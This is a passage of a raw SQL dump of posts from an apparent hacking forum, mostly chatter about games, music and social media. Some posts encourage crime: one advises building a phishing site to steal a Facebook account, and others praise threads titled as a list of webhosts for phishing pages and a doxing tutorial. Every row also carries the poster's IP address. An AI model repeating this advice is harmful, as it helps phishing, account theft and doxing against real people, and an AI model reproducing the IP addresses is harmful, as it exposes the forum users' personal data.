'2.124.223.31', '41738015', '1', '0', '0', '0', '1', 'b298a54dae81ba23f71815aeb33d5701', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5301', '921', '5297', '4', 'RE: Hey', '0', '222', 'Exposé', '1350548109', '[quote=\'LCS\' pid=\'5297\' dateline=\'1350547957\'] [quote=\'t3h jok3r\' pid=\'5229\' dateline=\'1350526136\'] Welcome to L33Thacking. [/quote] You just copied over 9000 other people. I\'m joking, I understand that you\'re the admin. Welcome to l33t. Stay active + HQ. [/quote] Jok3r ban him...for talkin trash to you.....omnomnom :P jkjk', '74.76.76.132', '1246514308', '1', '0', '222', '1350548122', '1', '54c3a9bdd5cd16e8603b0e5598967e57', '0', '1350548122'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5302', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '258', 'PiXEL^OG', '1350548291', 'They are just jealous cuz we are so leet lol But yeah AF seems kinda skidish', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '73cf1612dbb59e938d8235c0410d1e19', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5303', '821', '4294', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '222', 'Exposé', '1350549376', 'This girl I work with is really cute...she has a BF tho, but flirts with me 24/7. Should I just go ahead and bang her and not give a fuck. Or respect her situation and let her do her thing?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'cbd8f405e0f6be4c6b6c6822af4e79a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5304', '918', '5281', '65', 'RE: I feel famous', '0', '264', 'D?ea', '1350549497', '[quote=\'XTr3ME PiX3L\' pid=\'5281\' dateline=\'1350544811\'] Umm the dude in the video is famous , not you Plus ive got like 127 000 views in a video i posted of south park and my channel has like 234 000 total views though 14 year old kids have gotten up to 5 million plus a Machinima Partnership [/quote] If I did get offered a Machinima Partnership, I would say no, it is the most stupid you can do EVER. They don\'t pay as much as other networks, it takes one year to leave them and alot more.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '73d6f6f949ef683153e44965a1651b78', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5305', '927', '5191', '72', 'RE: BLACK OPS ZOMBIE TIPS', '0', '222', 'Exposé', '1350549594', 'Did Black ops 2 already come out or what?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'abb49726332505586cd1501a4f0e20b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5306', '927', '5191', '72', 'RE: BLACK OPS ZOMBIE TIPS', '0', '257', 'XxTREYZxX', '1350549856', 'no this is for just the original black ops sorry for the confusion?', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', '2b47f81a0481ffb9ed16ec4155e21c74', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5307', '872', '4717', '24', 'RE: Windows Updates, who uses It?', '0', '258', 'PiXEL^OG', '1350550016', 'I don\'t see a point in them... It just uses up my free memory', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'e0bacb30a848478c0af3d1278864aa61', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5308', '918', '5304', '65', 'RE: I feel famous', '0', '258', 'PiXEL^OG', '1350550157', '[quote=\'D?ea\' pid=\'5304\' dateline=\'1350549497\'] [quote=\'XTr3ME PiX3L\' pid=\'5281\' dateline=\'1350544811\'] Umm the dude in the video is famous , not you Plus ive got like 127 000 views in a video i posted of south park and my channel has like 234 000 total views though 14 year old kids have gotten up to 5 million plus a Machinima Partnership [/quote] If I did get offered a Machinima Partnership, I would say no, it is the most stupid you can do EVER. They don\'t pay as much as other networks, it takes one year to leave them and alot more. [/quote] Yeah i know that , but its not easy to get a legit one also i think they have a life time contract so that you can\'t leave ever!!', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '63cfa031399dc701db86dc923ae9e1c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5309', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '62', 'R?????zo?', '1350550345', 'Gratz LH on 5k posts, thanks everyone who posted :)', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', '9dff233f26b86243ca94389571aa446a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5310', '927', '5191', '72', 'RE: BLACK OPS ZOMBIE TIPS', '0', '258', 'PiXEL^OG', '1350550390', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5191\' dateline=\'1350519699\'] Knife Zombies till you reach level 4 and then buy the AK74u, unless you can reach the M16 and Claymores. [/quote] This one actually works , but its really old. Also you get more points by knifing', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '171ebd0252b7dd67e99f7ea2753fc854', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5311', '918', '5088', '65', 'RE: I feel famous', '0', '62', 'R?????zo?', '1350550572', 'Dont you get like loads of money if you partner with them though?', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', '097447b09a73a00af2780fd40114121a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5312', '873', '4718', '7', 'RE: What do you think of Facebook?', '0', '258', 'PiXEL^OG', '1350550636', 'Facebook is nothing short but moneymaking , Recently they are now putting ads in your news feed so they make money , they say its for \"server maintenance\" but they already make a shit ton without them Also when i go on facebook and i see all these bimbos taking pics of their nasty lunch or like that typical stuff and not to mention that YOLO bullshit fucking pisses me off so much i wanna smash my computer The site was good but since mid 2010 the site has gone to shit and its complete shit because its dominated by douche bags and such.', '139.190.235.246', '-1950422026', '0', '0', '258', '1350550827', '1', 'ce823cd66a65a61657ab654ac5a3cd74', '0', '1350550827'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5313', '872', '5307', '24', 'RE: Windows Updates, who uses It?', '0', '62', 'R?????zo?', '1350550644', '[quote=\'XTr3ME PiX3L\' pid=\'5307\' dateline=\'1350550016\'] I don\'t see a point in them... It just uses up my free memory [/quote] Exactly, microsoft update sucks :P', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', '28d9d9e5f381767e08b6bba37b5b5b4b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5314', '927', '5191', '72', 'RE: BLACK OPS ZOMBIE TIPS', '0', '257', 'XxTREYZxX', '1350550656', 'are these tips helpfull to you;s guys:) JW', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '74f8963920924042cc6d61f8b0332e87', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5315', '927', '5191', '72', 'RE: BLACK OPS ZOMBIE TIPS', '0', '62', 'R?????zo?', '1350550828', 'Nice tips, even though I don\'t play zombies anymore. Keep it coming.', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', '206d7464474297b1bf3004b1317b0e5d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5316', '922', '5121', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '62', 'R?????zo?', '1350550935', 'I will try then without it, once I get home.', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', 'c43d15597b68f9290a84e69d62ad0cb0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5317', '927', '5191', '72', 'RE: BLACK OPS ZOMBIE TIPS', '0', '257', 'XxTREYZxX', '1350551003', 'thanks an i will keep it coming reloadzor', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', '3aa89b19b19a13d7e9dabcb8bfcf2820', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5318', '43', '105', '7', 'RE: How did you find us?', '0', '62', 'R?????zo?', '1350551223', 'Welcome everyone who\'s new, enjoy your stay and stay active :)', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', 'e3434a1d0b64e64aa20a09cb58146207', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5319', '945', '5288', '7', 'RE: I dont want.......', '0', '62', 'R?????zo?', '1350551400', 'I think the post and PM thing is to keep the thread alive, I\'ve posted few downloads here and nobody replies but has a ton of views, wonder why :P', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', 'ac3cc02770423f9c937e8cd247b542aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5320', '944', '5284', '66', 'RE: What\'s your BF3 Method-ology?', '0', '62', 'R?????zo?', '1350551549', 'I get to the chopper and stay like that the whole map :P If I don\'t get it on time, I usually go and snipe dem noobs', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', 'f15406e4d04993225da36f288571c998', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5321', '918', '5311', '65', 'RE: I feel famous', '0', '258', 'PiXEL^OG', '1350551606', '[quote=\'R?????zo?\' pid=\'5311\' dateline=\'1350550572\'] Dont you get like loads of money if you partner with them though? [/quote] Naa , you get ONLY 20 dollars every month if your a small normal partner', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '9f56de1710f771e1d8b7f155ed609f72', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5322', '918', '5088', '65', 'RE: I feel famous', '0', '257', 'XxTREYZxX', '1350552493', 'so you should bud keep the good work up', '203.104.11.6', '-882373882', '1', '0', '0', '0', '1', '9dbf5c9fb34709b70c2e6a9aac8dee56', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5323', '922', '5121', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '257', 'XxTREYZxX', '1350552748', 'looks great i\'m definitely gonna try it out :)', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', 'eab716cf7a6d75fd88a9699b4ea6d0b6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5324', '937', '5258', '19', 'RE: Nude Bot- Mr. Do you want to fap?', '0', '62', 'R?????zo?', '1350553173', 'What does this do? Lol, who even code this :P', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', '24786b82697382945e2ee8b9a37d52fd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5325', '892', '4879', '8', 'RE: Post New And Awesome Songs Here !!!', '0', '257', 'XxTREYZxX', '1350553292', 'Gangnam style is pretty funny and so boss', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', 'f91a9e559c7bc84f4a4094396376813d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5326', '941', '5271', '35', 'RE: Logo Competition for LH?', '0', '62', 'R?????zo?', '1350553336', 'This is not because the current logo was me who made it, but I personaly think it fits the forum theme and looks great, but better changes are always welcome.', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', '16b9c942f86f45bf5be95429be9e58fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5327', '943', '5283', '74', 'RE: MINECRAFT PREMIUM GIVEAWAY(no surveys)', '0', '62', 'R?????zo?', '1350553478', 'Pm\'ing you right, this sounds cool. Thanks for this bro.', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', '4e89317c87fdf91f1cfd5c42f93df363', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5328', '941', '5271', '35', 'RE: Logo Competition for LH?', '0', '222', 'Exposé', '1350553506', 'We need something more unique like fkn0wned. Something that makes us stand out. And we need to redesign the header so it looks better....and more neat', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '1f1e52f702d5d1f52723643e41cb6348', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5329', '947', '0', '8', 'GANGNAM STYLE', '0', '257', 'XxTREYZxX', '1350553535', 'gangnam style is so boss who agrees everybody now op op op op op gangnam style , sexy ladies haah lol i saw him live at the x factor lol he such a funny dancer', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', 'e8803a977b9396bddba6ca8b9338a1c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5330', '938', '5259', '46', 'RE: List of good webhosts to host your phishing pages', '0', '62', 'R?????zo?', '1350553583', 'Thanks for this, might come handy some day.', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', '0f470a756f367441a3586e874192d3be', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5331', '821', '4294', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '62', 'R?????zo?', '1350553754', 'Bro just bang her if you have a chance, YOLO :)', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', 'acb5b9f8dd24cab2d479531de2a31b82', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5332', '821', '4294', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '257', 'XxTREYZxX', '1350553823', 'YOLO is the best explaination right here haha lol', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '6c4d7ad179fb11aa9fd0f9687c1b5100', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5333', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '62', 'R?????zo?', '1350554029', 'Yeah hes the best, even though I don\'t understand 80% of the lyrics it makes me laugh all the time, and I sing it on my own way lol', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', '421147d5f98c29d4d5c57c974fd73fd5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5334', '892', '4879', '8', 'RE: Post New And Awesome Songs Here !!!', '0', '62', 'R?????zo?', '1350554104', 'Muse - Madness, couple months new but great song', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', 'a4fb6548778649dc03c2014adb810666', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5335', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '257', 'XxTREYZxX', '1350554136', 'yeah there is a English version on youtube and hes so funny', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '2724851c82645eecbfd3a92a11cefd6c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5336', '948', '0', '74', 'MINECRAFT world download', '0', '257', 'XxTREYZxX', '1350554401', 'hello, and i just wanted to tell you about my brother map on minecraft its a castle pvp with chest scattered around my brother is only 8 so dont be mean and please download he will apprciate it alot download link: fixed:http://www.minecraftworldmap.com/worlds/6aAJL#/-1641/64/694/min/0/0 thanks guys', '203.104.11.10', '-882373878', '1', '0', '257', '1350608556', '1', '689dd5878b565db1ee5bd35a8be03d6b', '0', '1350608556'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5337', '922', '5323', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '270', 'LCS', '1350554787', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5323\' dateline=\'1350552748\'] looks great i\'m definitely gonna try it out :) [/quote] Thanks! I hope you enjoy it! :)', '2.124.223.31', '41738015', '1', '0', '0', '0', '1', 'cb443525a57f2f6c8bd4a8ec2abd45f9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5338', '922', '5337', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '257', 'XxTREYZxX', '1350555393', '[quote=\'LCS\' pid=\'5337\' dateline=\'1350554787\'] [quote=\'?(???)?TREYZ?(???)?\' pid=\'5323\' dateline=\'1350552748\'] looks great i\'m definitely gonna try it out :) [/quote] Thanks! I hope you enjoy it! :) [/quote] i will enjoy and hope it turns out good:)', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', 'c730074e73228968229045c428dba5de', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5339', '949', '0', '72', 'mw3 hack', '0', '257', 'XxTREYZxX', '1350555713', 'hey i\'v got a mw3 hack for you guys link:www.youtube.com/watch?v=uzfzb59DP2w download link is in the description all rights go to XRandomHacksX please hit that big like button thanks hope you enjoy :)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '7099e9e3f2ada7bef8b945778923a917', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5340', '946', '5293', '19', 'RE: Delete the dam stars :P', '0', '228', 'VirtualLegend', '1350556466', 'it looks empty when the stars are gone [hr] This thread has been junked.', '83.83.167.183', '1397991351', '1', '0', '228', '1350556939', '1', '5db9083830593761343bd65e3d463b9d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5341', '877', '4747', '11', 'RE: could some one teach how to hack facebook tetrisfreinds', '0', '228', 'VirtualLegend', '1350556593', 'Just make a phishing site. And then give it to your victims', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2f1948206022d2b6db7fec9955868ccd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5342', '844', '4418', '73', 'RE: TEMPLE RUN CHEAT (UNLIMITED RUN)', '0', '228', 'VirtualLegend', '1350556869', 'Already knew this, but nice tutorial', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'eb0a90849721820aeed101fc735189a0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5343', '941', '5271', '35', 'RE: Logo Competition for LH?', '0', '228', 'VirtualLegend', '1350557323', 'I think it\'s a good idea', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '53f7cb2997420c2c147fa0d47253c772', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5344', '844', '4418', '73', 'RE: TEMPLE RUN CHEAT (UNLIMITED RUN)', '0', '100', '??zg???g????61', '1350557901', 'Nope they patched it, now it only works for a little bit then it gives you the achievement \"the glitch\" and generates obstacles. You guys probably haven\'t updated it.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'a560df4416d510aa74b6cea8cbaa3b06', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5345', '937', '5258', '19', 'RE: Nude Bot- Mr. Do you want to fap?', '0', '228', 'VirtualLegend', '1350558427', 'This kinda Fails. Don\'t you think', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'a248658413113007e02d2f06b62bd8c7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5346', '945', '5319', '7', 'RE: I dont want.......', '0', '100', '??zg???g????61', '1350558471', '[quote=\'R?????zo?\' pid=\'5319\' dateline=\'1350551400\'] I think the post and PM thing is to keep the thread alive, I\'ve posted few downloads here and nobody replies but has a ton of views, wonder why :P [/quote] Exactly, post and pm stops people from leaching.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '53b6cf818b85b31f2d2be7e89fb23ddf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5347', '50', '132', '12', 'RE: [tut]How to DOX', '0', '228', 'VirtualLegend', '1350558532', 'This is very helpfull Thanks for the Guide!!!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '79e092e17948d42af8af9cef0bc7f55d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5348', '938', '5259', '46', 'RE: List of good webhosts to host your phishing pages', '0', '228', 'VirtualLegend', '1350558703', 'Nice list. I Will check it out !', '83.83.167.183', '1397991351', '1', '0', '0', 